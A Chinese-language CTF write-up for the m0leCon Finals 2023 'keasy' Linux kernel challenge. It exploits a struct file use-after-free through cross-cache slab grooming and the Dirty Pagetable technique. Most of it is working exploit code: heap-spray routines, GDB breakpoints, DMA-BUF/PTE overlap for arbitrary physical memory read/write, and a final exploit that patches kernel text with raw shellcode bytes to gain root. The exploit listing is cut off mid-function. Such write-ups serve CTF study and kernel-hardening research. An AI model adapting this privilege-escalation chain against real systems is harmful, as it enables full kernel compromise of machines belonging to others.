m0leConFinals 2023 Keasy CrossCache UAF + DirtyPagetable

传说中的dirty_pagetable.

漏洞在于copy_to_user失败后, 会fput释放file, 但用户态仍能通过fd访问到该file, 造成file结构体的UAF.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
 * keasy_ioctl - the challenge's only entry point (quoted verbatim; the
 * bug below is the intended vulnerability, not something to fix here).
 *
 * Intended flow: allocate an anonymous struct file, reserve an fd,
 * publish the fd to userspace, return 0.  One-shot: 'enabled' is
 * cleared on first use.
 *
 * THE BUG: once fd_install() has run, the fd table owns a reference to
 * 'myfile' and the fd is already visible to userspace.  If the later
 * copy_to_user() fails, the 'err' path calls fput(myfile), dropping the
 * last reference and freeing the file while the installed fd still
 * points at it.  Userspace can force the failure by passing an unmapped
 * 'arg', keeping a dangling fd: a struct file use-after-free.
 *
 * Also note: the anon_inode_getfile() return value is never checked
 * (it can be an ERR_PTR on failure).
 */
static long keasy_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
long ret = -EINVAL;
struct file *myfile;
int fd;

/* one-shot gate: only the first ioctl ever does anything */
if (!enabled) {
goto out;
}
enabled = 0;

myfile = anon_inode_getfile("[easy]", &keasy_file_fops, NULL, 0);

fd = get_unused_fd_flags(O_CLOEXEC);
if (fd < 0) {
ret = fd;
goto err;
}

/* After this point the fd table holds the reference; reaching 'err'
 * from here is what creates the UAF. */
fd_install(fd, myfile);

/* 'arg' is fully user-controlled; an unmapped pointer forces failure. */
if (copy_to_user((unsigned int __user *)arg, &fd, sizeof(fd))) {
ret = -EINVAL;
goto err;
}

ret = 0;
return ret;

err:
fput(myfile); /* frees the file while the installed fd still references it */
out:
return ret;
}

CrossCache UAF的探索

由于file结构体是从独立缓存filp中分配的, 则不可避免的要用到CrossCache的手法.

查看与CrossCache UAF构造相关的系统变量的值.

但是在实践中发现了一个问题:

  1. cpu_partial为52, 但在还远未有52个partial_slab时即触发了__unfreeze_partials.

调试发现, s->cpu_partial_slabs的值为7(偏移在0x30处), 而不是52(这很奇怪, 从kmem_cache结构体来看, cpu_partial_slabs应该位于偏移0x28处, 且该处值确实为52).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
/*
 * put_cpu_partial - quoted from Linux mm/slub.c (CONFIG_SLUB_CPU_PARTIAL)
 * for reference.
 *
 * Pushes a slab onto the head of the per-cpu partial list.  The list
 * head's 'slabs' field caches the list length; when 'drain' is set and
 * that cached count has already reached s->cpu_partial_slabs, the whole
 * existing list is handed to __unfreeze_partials() (moved to the
 * per-node partial list).  That drain event is exactly what the
 * cross-cache grooming in this writeup aims to trigger.
 */
static void put_cpu_partial(struct kmem_cache *s, struct slab *slab, int drain)
{
struct slab *oldslab;
struct slab *slab_to_unfreeze = NULL;
unsigned long flags;
int slabs = 0;

local_lock_irqsave(&s->cpu_slab->lock, flags);

oldslab = this_cpu_read(s->cpu_slab->partial);

if (oldslab) {
if (drain && oldslab->slabs >= s->cpu_partial_slabs) {
/*
* Partial array is full. Move the existing set to the
* per node partial list. Postpone the actual unfreezing
* outside of the critical section.
*/
slab_to_unfreeze = oldslab;
oldslab = NULL;
} else {
slabs = oldslab->slabs;
}
}

slabs++;

slab->slabs = slabs; /* new head caches the (incremented) list length */
slab->next = oldslab; /* note: insertion at the HEAD of the list */

this_cpu_write(s->cpu_slab->partial, slab);

local_unlock_irqrestore(&s->cpu_slab->lock, flags);

if (slab_to_unfreeze) {
__unfreeze_partials(s, slab_to_unfreeze);
stat(s, CPU_PARTIAL_DRAIN);
}
}

构造方式一:

有如下两种可能的情形:

  1. 常规的CrossCache UAF构造, 原理见这篇文章, 但是原文的方式没有考虑kmem_cache_node的min_partial限制.
  2. ioctl触发的fput释放是通过RCU机制进行的, 所以等target释放时, 可能后面的一些喷射工作已经进行, 此时target所在板已经不再活跃, 所以会直接过早进入cpu->partial, 最终成为kmem_cache_node的min_partial个partial_slab之一.直到释放完postvictim_objs, target所在板完全空闲后才会从kmem_cache_node直接销毁.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/*
 * Cross-cache construction #1 (snippet, not standalone-compilable):
 * spray more than (CPU_PARTIAL+1) slabs' worth of files around the
 * victim so that closing them overflows the per-cpu partial list,
 * forcing put_cpu_partial() to drain slabs toward the page allocator.
 */
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define N_OVERFLOW ((CPU_PARTIAL+1)*OBJS_PER_SLAB)
/* NOTE(review): unparenthesized macro bodies (OBJS_PER_SLAB-1,
 * OBJS_PER_SLAB*CC_FACTOR) are fragile; harmless for the uses in this
 * snippet, but wrapping them in (...) would be safer. */
#define N_PREVICTIM OBJS_PER_SLAB-1

#define CC_FACTOR CPU_PARTIAL
#define N_POSTVICTIM OBJS_PER_SLAB*CC_FACTOR


int overflow_objs[N_OVERFLOW];
int previctim_objs[N_PREVICTIM];
int postvictim_objs[N_POSTVICTIM];

/* each open("/") allocates one struct file from the filp cache */
for(int i = 0;i < N_OVERFLOW;++i)
{
overflow_objs[i] = open("/",O_RDONLY);
}

/* OBJS_PER_SLAB-1 files: the next allocation (the victim file created
 * inside the ioctl) lands in the same slab */
for(int i = 0;i < N_PREVICTIM;++i)
{
previctim_objs[i] = open("/",O_RDONLY);
}

/* forces the copy_to_user() failure path -> fput() -> dangling fd */
ioctl(dev_fd,0xDEADBEAF);
/*1 fd , 0 ref*/


for(int i = 0;i < N_POSTVICTIM;++i)
{
postvictim_objs[i] = open("/",O_RDONLY);
}
/*2 fd , 1 ref*/

puts("[+] Releasing files...");
// Release the page for file slab cache
logd("1");
for(int i = 0;i < N_OVERFLOW;++i)
close(overflow_objs[i]);
logd("2");
for(int i = 0;i < N_PREVICTIM;++i)
close(previctim_objs[i]);
logd("3");
for(int i = 0;i < N_POSTVICTIM;++i)
close(postvictim_objs[i]);

构造方式二:
思路: 布置好NODE_MIN_PARTIAL个slab准备填充kmem_cache_node->partial, 再布置target_slab, 再布置overflow_objs. 然后依次释放, 待kmem_cache_cpu->partial填满, 则CPU_PARTIAL个slab将进入kmem_cache_node,其中NODE_MIN_PARTIAL个slab留在kmem_cache_node中, target_slab被销毁.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
    
/*
 * Cross-cache construction #2, first attempt (snippet): pre-fill
 * kmem_cache_node->partial with NODE_MIN_PARTIAL slabs, then build the
 * victim slab, then overflow slabs.  The intent is that the drain moves
 * CPU_PARTIAL slabs to the node list, NODE_MIN_PARTIAL stay there, and
 * the fully-free victim slab is discarded.  As the analysis after the
 * listing explains, this release order is WRONG: put_cpu_partial()
 * inserts at the list head, so the victim slab ends up first on
 * node->partial instead of being discarded.
 */
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define NODE_MIN_PARTIAL 5
#define N_NODEPARTIAL (NODE_MIN_PARTIAL*OBJS_PER_SLAB)
#define N_OVERFLOW ((CPU_PARTIAL-NODE_MIN_PARTIAL-2)*OBJS_PER_SLAB)
#define N_PREVICTIM OBJS_PER_SLAB-1

#define CC_FACTOR 3
#define N_POSTVICTIM OBJS_PER_SLAB*CC_FACTOR


int nodeminpartial_objs[N_NODEPARTIAL];
int previctim_objs[N_PREVICTIM];
int postvictim_objs[N_POSTVICTIM];
int overflow_objs[N_OVERFLOW];

logd("Prepare objs for filling kmem_cache_node->partial");
for(int i = 0;i < N_NODEPARTIAL;++i)
{
nodeminpartial_objs[i] = open("/",O_RDONLY);
}

logd("Prepare target slab");
logd("previctim");
/* fill all but one slot so the victim file lands in this slab */
for(int i = 0;i < N_PREVICTIM;++i)
{
previctim_objs[i] = open("/",O_RDONLY);
}

/* forces the copy_to_user() failure path -> fput() -> dangling fd */
ioctl(dev_fd,0xDEADBEAF);
/*1 fd , 0 ref*/

logd("postvictim");
for(int i = 0;i < N_POSTVICTIM;++i)
{
postvictim_objs[i] = open("/",O_RDONLY);
}
/*2 fd , 1 ref*/

for(int i = 0;i < N_OVERFLOW;++i)
{
overflow_objs[i] = open("/",O_RDONLY);
}

logd("Trigger __unfreeze_partials then discard");

logd("1");
for(int i = 0;i < N_NODEPARTIAL;++i)
close(nodeminpartial_objs[i]);
logd("2");
for(int i = 0;i < N_PREVICTIM;++i)
close(previctim_objs[i]);
logd("3");
for(int i = 0;i < N_POSTVICTIM;++i)
close(postvictim_objs[i]);
logd("4");
for(int i = 0;i < N_OVERFLOW;++i)
close(overflow_objs[i]);

但是失败了, 查看发现target_slab变成了kmem_cache_node->partial链表的第一个. 分析原因是put_cpu_partial时是从链表头添加, (unfreeze_partial是从链表尾添加到node->partial). 所以应该调换布置的顺序.

该构造方法可以比较稳定的销毁target_slab, 且尽量避免销毁多余的slab(似乎也没这个必要,所以有了第三种方法).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
/*
 * Cross-cache construction #2, corrected release order (snippet):
 * because put_cpu_partial() inserts at the list head while
 * __unfreeze_partials() appends to node->partial from the tail, the
 * victim slab must be released FIRST so it ends up beyond the
 * min_partial slabs and gets discarded.  This version reliably frees
 * the victim slab back to the buddy allocator.
 */
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define NODE_MIN_PARTIAL 5
#define N_NODEPARTIAL (NODE_MIN_PARTIAL*OBJS_PER_SLAB)
#define N_PREVICTIM OBJS_PER_SLAB-1
#define N_POSTVICTIM OBJS_PER_SLAB+1

#define CC_FACTOR 3
#define N_OVERFLOW ((CPU_PARTIAL-NODE_MIN_PARTIAL-2+CC_FACTOR)*OBJS_PER_SLAB)


int nodeminpartial_objs[N_NODEPARTIAL];
int previctim_objs[N_PREVICTIM];
int postvictim_objs[N_POSTVICTIM];
int overflow_objs[N_OVERFLOW];

logd("Prepare target slab");
logd("previctim");
/* fill all but one slot so the victim file lands in this slab */
for(int i = 0;i < N_PREVICTIM;++i)
{
previctim_objs[i] = open("/",O_RDONLY);
}

/* forces the copy_to_user() failure path -> fput() -> dangling fd */
ioctl(dev_fd,0xDEADBEAF);
/*1 fd , 0 ref*/

logd("postvictim");
for(int i = 0;i < N_POSTVICTIM;++i)
{
postvictim_objs[i] = open("/",O_RDONLY);
}
/*2 fd , 1 ref*/

logd("Prepare objs for filling kmem_cache_node->partial");
for(int i = 0;i < N_NODEPARTIAL;++i)
{
nodeminpartial_objs[i] = open("/",O_RDONLY);
}

for(int i = 0;i < N_OVERFLOW;++i)
{
overflow_objs[i] = open("/",O_RDONLY);
}

logd("Trigger __unfreeze_partials then discard");

/* victim slab first: it must sit past the min_partial survivors */
logd("1");
for(int i = 0;i < N_PREVICTIM;++i)
close(previctim_objs[i]);
logd("2");
for(int i = 0;i < N_POSTVICTIM;++i)
close(postvictim_objs[i]);

logd("3");
for(int i = 0;i < N_NODEPARTIAL;++i)
close(nodeminpartial_objs[i]);

logd("4");
for(int i = 0;i < N_OVERFLOW;++i)
close(overflow_objs[i]);

/*1 fd , 0 ref*/
/* give the RCU-deferred file frees time to complete */
sleep(20);

构造方法三:
确实,就是这么暴力, but work, 本质上和构造方法一相同.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/* Cross-cache construction #3 (snippet): brute force -- just spray far
 * more files than the per-cpu partial list can hold, with the victim in
 * the middle, then free everything.  Same principle as construction #1. */
//#define N_FILESPRAY 2*OBJS_PER_SLAB*(CPU_PARTIAL+1)
#define N_FILESPRAY 0x100

puts("[+] Spraying files...");
// Spray file (1)
for (int i = 0; i < N_FILESPRAY/2; i++)
if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

// Get dangling file descriptor: the ioctl allocates the next fd slot
int ezfd = file_spray[N_FILESPRAY/2-1] + 1;
if (ioctl(fd, 0, 0xdeadbeef) == 0) // Use-after-Free
fatal("ioctl did not fail");

// Spray file (2)
for (int i = N_FILESPRAY/2; i < N_FILESPRAY; i++)
if ((file_spray[i] = open("/", O_RDONLY)) < 0) fatal("/");

puts("[+] Releasing files...");
// Release the page for file slab cache
for (int i = 0; i < N_FILESPRAY; i++)
close(file_spray[i]);

调堆时可能会用到的断点.

1
2
3
4
5
6
7
8
9
10
11
# GDB breakpoints useful while debugging the slab grooming.
# Commented-out entries were used at earlier stages; the numeric
# offsets (+0x5c, +57, +208, +74) are specific to this kernel build.
b keasy_open

# b alloc_empty_file
# b *(&__alloc_file+0x18)
b *(&keasy_ioctl+0x5c)
# b __fput
# b *(&file_free_rcu+57)
# b *(&__unfreeze_partials+208)
# b discard_slab
b __free_slab
# b *(&put_cpu_partial+74)

从File UAF出发的Dirty_Pagetable

再mmap分配一些匿名页并写入触发实际分配后, 可以看到file结构体已经被PTE覆盖.

但UAF的file结构体拥有的原语非常受限, 我们仍无法随意的修改PTE来完成物理地址任意写.

一个增量原语是通过dup增加file->f_count(偏移0x38处), 即可使PTE对应的物理地址发生偏移, 然而dup是有限制的(fork可以增大dup的次数,但仍有限制), 无法直接将其增加到内核text段(内核text段在低地址且距离极远).

于是走另一条路,dup 0x1000次使得两个PTE对应的物理地址重叠, 进一步munmap即可完成对page的UAF.


但我们没办法让新的用户页表占据UAF的page, 因为用户页表的物理页是从MIGRATE_UNMOVABLE内存区中分配, 而我们UAF的mmap来的匿名物理页来自MIGRATE_MOVABLE.

于是接下来有两种思路:

  1. 从MIGRATE_MOVABLE区域找可利用的对象.
  2. 使用其他方式映射页面, 使得UAF的页面来自MIGRATE_UNMOVABLE.

原文采用的是思路2. DMA-BUF使用的物理页来自MIGRATE_UNMOVABLE. 且与pte的页面来自同一个order.
如果布置使得DMA-BUF的页面与某些PTE相邻, 利用UAF增加DMA-BUF对应PTE使得DMA-BUF的页面与相邻的PTE重叠, 即可通过修改DMA-BUF页面的方式修改用户页表.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
/*
 * Dirty Pagetable stage (excerpt).  Half the sprayed regions are
 * faulted in before allocating the DMA-BUF and half after, so that with
 * luck the DMA-BUF's backing page lands among the PTE pages.
 */
logd("Spray PTE");
for(int i = 0; i < N_PAGESPRAY/2;++i)
{
logd("%p",page_sprays[i]);
/* one write per 0x1000 faults in 8 PTEs per region */
for(int j = 0; j < 8; ++j)
*(page_sprays[i]+j*0x1000) = 'A'+j;
}

// Allocate DMA-BUF heap
/* allocation only -- the buffer is mapped later, over the overlap */
int dma_buf_fd = -1;
struct dma_heap_allocation_data data;
data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;
if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
err_exit("DMA_HEAP_IOCTL_ALLOC");
printf("[+] dma_buf_fd: %d\n", dma_buf_fd = data.fd);


for(int i = N_PAGESPRAY/2; i < N_PAGESPRAY;++i)
{
logd("%p",page_sprays[i]);
for(int j = 0; j < 8; ++j)
*(page_sprays[i]+j*0x1000) = 'A'+j;
}


logd("Increment file->f_count to construct page overlapping");
/* the victim file's fd slot is right after the last previctim fd */
int ezfd = previctim_objs[N_PREVICTIM-1]+1;
logd("ezfd is %d",ezfd);
// Increment physical address
/* f_count aliases a PTE: +0x1000 shifts it one physical page forward,
 * so two of our virtual pages now map the same frame */
for (int i = 0; i < 0x1000; i++)
if (dup(ezfd) < 0)
err_exit("dup");


logd("Find overlapping page");
/* NOTE(review): overlapping_page is read uninitialized if no mismatch
 * is found, and this 'break' only exits the inner loop -- the outer
 * scan keeps running.  Fixed in the final exploit below. */
char* overlapping_page;
for(int i = 0; i < N_PAGESPRAY;++i)
{
for(int j = 0; j < 8; ++j)
if(*(page_sprays[i]+j*0x1000) != 'A'+j)
{
overlapping_page = page_sprays[i]+j*0x1000;
logi("Overlapping page: %p",overlapping_page);
break;
}
}

logd("Replace overlapping_page's PTE with dmabuf's PTE");
munmap(overlapping_page,0x1000);
char* dmabuf = mmap(overlapping_page,0x1000,7,MAP_SHARED|MAP_POPULATE,dma_buf_fd,0);
strcpy(dmabuf,"Snowfall");


size_t buf[0x1000];
memcpy(buf,dmabuf,0x1000);
hexdump(buf,0x30);

logi("Increment dmabuf's PTE to overlap with some other PTE");
// Increment physical address
/* walk the DMA-BUF's PTE onto a neighbouring page-table page */
for (int i = 0; i < 0x2000; i++)
if (dup(ezfd) < 0)
err_exit("dup");

/* the dump should now show raw PTEs of some sprayed region */
memcpy(buf,dmabuf,0x1000);
hexdump(buf,0x30);

可以看到增加后dma-buf已经与一些PTE重叠, 此时更改这些PTE, 我们便拥有了任意物理内存读写的能力.

此时HanQi脱口而出那句名言.
“世界上最遥远的距离,是任意地址写和ASLR”.

但在当前情形下形同虚设. 原因如下:

  1. 我们不仅能够任意地址写, 同时还能任意地址读. 且是物理地址, 不会由于中途遇到非法地址而导致崩溃. 这给了我们搜索的能力.
  2. 内核中在固定物理地址处有残留的内核物理地址,如0x9c000处.(经典)

然后改写内核text段提权+逃逸就行了.
这部分直接照搬了.

EXP

最终exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
#include <kernelpwn.h>

/* Userspace mirror of the DMA-BUF heap UAPI struct
 * (include/uapi/linux/dma-heap.h); layout must match the kernel's. */
struct dma_heap_allocation_data {
uint64_t len;        /* in: requested buffer size in bytes */
uint32_t fd;         /* out: dma-buf fd returned by the kernel */
uint32_t fd_flags;   /* in: flags for the new fd (e.g. O_RDWR) */
uint64_t heap_flags; /* in: heap-specific flags (0 here) */
};
/* == _IOWR('H', 0x0, struct dma_heap_allocation_data) */
#define DMA_HEAP_IOCTL_ALLOC 0xc0184800


/*
 * Post-exploit payload: the kernel shellcode returns to user mode here
 * with root credentials.  Reading /dev/sda succeeding proves the
 * privilege escalation worked; its first 0x100 bytes (the flag disk)
 * are dumped to stdout.  Never returns.
 */
static void win() {
char flag[0x100];
int sda = open("/dev/sda", O_RDONLY);
if (sda < 0) {
puts("[-] Lose...");
exit(0);
}
puts("[+] Win!");
read(sda, flag, 0x100);
write(1, flag, 0x100);
puts("[+] Done");
exit(0);
}


/*
 * Exploit driver: keasy struct-file UAF -> cross-cache free of the filp
 * slab page -> page reused as a user page table (Dirty Pagetable) ->
 * arbitrary physical R/W via a DMA-BUF aliased over a PTE page ->
 * patch do_symlinkat in kernel .text -> root shell via win().
 *
 * Relies on kernelpwn.h helpers: save_status()/bind_core(), logd/logi,
 * err_exit, hexdump, dev_fd, user_cs/user_ss/user_sp/user_rflags.
 *
 * Review fixes applied vs. the original listing (logic unchanged):
 *   - setvbuf(): buffer and mode arguments were swapped;
 *   - removed unused local 'ret';
 *   - overlapping_page/arb_ptr no longer read uninitialized when a scan
 *     fails; the overlap scan now exits both loops on the first hit;
 *   - mmap() hint cast to void*; size_t printed via (void*) cast;
 *   - grooming macros parenthesized.
 */
int main()
{
    /* fix: setvbuf(stream, buf, mode, size) -- original passed
     * (_IONBF, 0, 0), i.e. _IONBF as the buffer pointer. */
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    save_status();   /* snapshot user cs/ss/rsp/rflags for ret-to-user */
    bind_core(0);    /* SLUB per-cpu grooming must stay on one CPU */

    if ((dev_fd = open("/dev/keasy", O_RDWR)) < 0) {
        err_exit("open device");
    }

    // Open DMA-BUF
    /* NOTE(review): creat()'s 2nd parameter is a mode_t; passing O_RDWR
     * works only because the device node already exists.  A plain
     * open("/dev/dma_heap/system", O_RDWR) would be conventional --
     * TODO confirm why creat() was chosen. */
    int dmafd = creat("/dev/dma_heap/system", O_RDWR);
    if (dmafd == -1)
        err_exit("/dev/dma_heap/system");

    /* Values probed from this kernel: 16 files per slab, 7 per-cpu
     * partial slabs, node min_partial of 5. */
#define OBJS_PER_SLAB 16
#define CPU_PARTIAL 7
#define NODE_MIN_PARTIAL 5
#define N_NODEPARTIAL (NODE_MIN_PARTIAL * OBJS_PER_SLAB)
#define N_PREVICTIM (OBJS_PER_SLAB - 1)
#define N_POSTVICTIM (OBJS_PER_SLAB + 1)

#define CC_FACTOR 3
#define N_OVERFLOW ((CPU_PARTIAL - NODE_MIN_PARTIAL - 2 + CC_FACTOR) * OBJS_PER_SLAB)

    /* Reserve VA ranges now; PTE pages are allocated only at fault time. */
#define N_PAGESPRAY 0x200
    char *page_sprays[N_PAGESPRAY];
    for (int i = 0; i < N_PAGESPRAY; ++i)
        page_sprays[i] = mmap((void *)(0xDEAD0000UL + i * 0x10000UL), 0x8000,
                              7 /* RWX */, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    int nodeminpartial_objs[N_NODEPARTIAL];
    int previctim_objs[N_PREVICTIM];
    int postvictim_objs[N_POSTVICTIM];
    int overflow_objs[N_OVERFLOW];

    /* --- Stage 1: cross-cache free of the victim file's slab --- */
    logd("Prepare target slab");
    logd("previctim");
    for (int i = 0; i < N_PREVICTIM; ++i) {
        previctim_objs[i] = open("/", O_RDONLY);
    }

    /* copy_to_user(0xCAFEBABE, ...) fails -> fput() on an installed fd:
     * we now hold a dangling fd to a freed struct file. */
    ioctl(dev_fd, 0xCAFEBABE);
    /*1 fd , 0 ref*/

    logd("postvictim");
    for (int i = 0; i < N_POSTVICTIM; ++i) {
        postvictim_objs[i] = open("/", O_RDONLY);
    }
    /*2 fd , 1 ref*/

    logd("Prepare objs for filling kmem_cache_node->partial");
    for (int i = 0; i < N_NODEPARTIAL; ++i) {
        nodeminpartial_objs[i] = open("/", O_RDONLY);
    }

    for (int i = 0; i < N_OVERFLOW; ++i) {
        overflow_objs[i] = open("/", O_RDONLY);
    }

    logd("Trigger __unfreeze_partials then discard");

    /* victim slab first, so it lands past the min_partial survivors and
     * is discarded rather than kept on node->partial */
    for (int i = 0; i < N_PREVICTIM; ++i)
        close(previctim_objs[i]);

    for (int i = 0; i < N_POSTVICTIM; ++i)
        close(postvictim_objs[i]);

    for (int i = 0; i < N_NODEPARTIAL; ++i)
        close(nodeminpartial_objs[i]);

    for (int i = 0; i < N_OVERFLOW; ++i)
        close(overflow_objs[i]);

    /*1 fd , 0 ref*/

    /* --- Stage 2: let user page tables reuse the freed slab page --- */
    logd("Spray PTE");
    for (int i = 0; i < N_PAGESPRAY / 2; ++i) {
        // logd("%p",page_sprays[i]);
        for (int j = 0; j < 8; ++j)
            *(page_sprays[i] + j * 0x1000) = 'A' + j; /* fault in 8 PTEs */
    }

    // Allocate DMA-BUF heap
    /* allocation only (mapped later); its backing page comes from
     * MIGRATE_UNMOVABLE, the same pool as page-table pages */
    int dma_buf_fd = -1;
    struct dma_heap_allocation_data data;
    data.len = 0x1000;
    data.fd_flags = O_RDWR;
    data.heap_flags = 0;
    data.fd = 0;
    if (ioctl(dmafd, DMA_HEAP_IOCTL_ALLOC, &data) < 0)
        err_exit("DMA_HEAP_IOCTL_ALLOC");
    logi("dma_buf_fd: %d", dma_buf_fd = data.fd);

    for (int i = N_PAGESPRAY / 2; i < N_PAGESPRAY; ++i) {
        // logd("%p",page_sprays[i]);
        for (int j = 0; j < 8; ++j)
            *(page_sprays[i] + j * 0x1000) = 'A' + j;
    }

    /* --- Stage 3: the dangling file's f_count aliases a PTE --- */
    logd("Increment file->f_count to construct page overlapping");
    int ezfd = previctim_objs[N_PREVICTIM - 1] + 1; /* the dangling fd */
    logd("ezfd is %d", ezfd);
    /* f_count += 0x1000 shifts the aliased PTE one physical page
     * forward: two of our virtual pages now map the same frame */
    for (int i = 0; i < 0x1000; i++)
        if (dup(ezfd) < 0)
            err_exit("dup");

    logd("Find overlapping page");
    char *overlapping_page = NULL; /* fix: was read uninitialized on miss */
    for (int i = 0; i < N_PAGESPRAY; ++i) {
        for (int j = 0; j < 8; ++j)
            if (*(page_sprays[i] + j * 0x1000) != 'A' + j) {
                overlapping_page = page_sprays[i] + j * 0x1000;
                logi("Overlapping page: %p", overlapping_page);
                goto found; /* fix: plain 'break' only left the inner loop */
            }
    }
found:
    if (!overlapping_page)
        err_exit("no overlapping page found");

    /* --- Stage 4: swap the duplicated mapping for the DMA-BUF --- */
    logd("Replace overlapping_page's PTE with dmabuf's PTE");
    munmap(overlapping_page, 0x1000);
    char *dmabuf = mmap(overlapping_page, 0x1000, 7,
                        MAP_SHARED | MAP_POPULATE, dma_buf_fd, 0);
    strcpy(dmabuf, "Snowfall");

    size_t buf[0x1000];
    memcpy(buf, dmabuf, 0x1000);
    hexdump(buf, 0x30);

    logi("Increment dmabuf's PTE to overlap with some other PTE");
    /* walk the DMA-BUF's PTE onto a neighbouring page-table page */
    for (int i = 0; i < 0x2000; i++)
        if (dup(ezfd) < 0)
            err_exit("dup");

    /* the dump should now show raw PTEs of some sprayed region */
    memcpy(buf, dmabuf, 0x1000);
    hexdump(buf, 0x30);

    /* --- Stage 5: arbitrary physical R/W through the hijacked PTE --- */
    /* Point the first PTE at phys 0x9c000, which holds a residual
     * kernel physical pointer on this build; 0x67 = P|RW|USER|A|D,
     * top bit = NX. */
    *(size_t *)dmabuf = 0x800000000009c067;

    char *arb_ptr = NULL; /* fix: was read uninitialized on miss */
    for (int i = 0; i < N_PAGESPRAY; i++) {
        if (page_sprays[i] == overlapping_page) continue;
        if (*(size_t *)page_sprays[i] > 0xffff) {
            arb_ptr = page_sprays[i];
            printf("[+] Found victim page: %p\n", arb_ptr);
            break;
        }
    }
    if (!arb_ptr)
        err_exit("no victim page found");

    /* 0x1c04000: build-specific offset of the leaked pointer's target
     * from the kernel physical base -- TODO confirm per kernel. */
    size_t phys_base = ((*(size_t *)arb_ptr) & ~0xfff) - 0x1c04000;
    logi("Got phy_base: %p", (void *)phys_base); /* fix: cast for %p */

    /* Patch do_symlinkat (phys_base + 0x24d4c0) with ret-to-user
     * shellcode; the 0x11..0x66 runs are placeholders patched below. */
    logi("Overwriting do_symlinkat...");
    size_t phys_func = phys_base + 0x24d4c0;
    *(size_t *)dmabuf = (phys_func & ~0xfff) | 0x8000000000000067;
    char shellcode[] = {0xf3, 0x0f, 0x1e, 0xfa, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x49, 0x81, 0xef, 0xc9, 0xd4, 0x24, 0x00, 0x49, 0x8d, 0xbf, 0xd8, 0x5e, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x20, 0xe6, 0x0a, 0x00, 0xff, 0xd0, 0xbf, 0x01, 0x00, 0x00, 0x00, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc7, 0x49, 0x8d, 0xb7, 0xe0, 0x5c, 0x44, 0x01, 0x49, 0x8d, 0x87, 0x40, 0xc1, 0x0a, 0x00, 0xff, 0xd0, 0x49, 0x8d, 0xbf, 0x48, 0x82, 0x53, 0x01, 0x49, 0x8d, 0x87, 0x90, 0xf8, 0x27, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc3, 0x48, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x49, 0x8d, 0x87, 0x50, 0x37, 0x0a, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x98, 0x40, 0x07, 0x00, 0x00, 0x31, 0xc0, 0x48, 0x89, 0x04, 0x24, 0x48, 0x89, 0x44, 0x24, 0x08, 0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x48, 0x89, 0x44, 0x24, 0x10, 0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x48, 0x89, 0x44, 0x24, 0x18, 0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x48, 0x89, 0x44, 0x24, 0x30, 0x49, 0x8d, 0x87, 0x41, 0x0f, 0xc0, 0x00, 0xff, 0xe0, 0xcc};

    /* Fill in: target pid, win() address, and the saved user-mode
     * cs/rflags/sp/ss for the iret frame. */
    void *p;
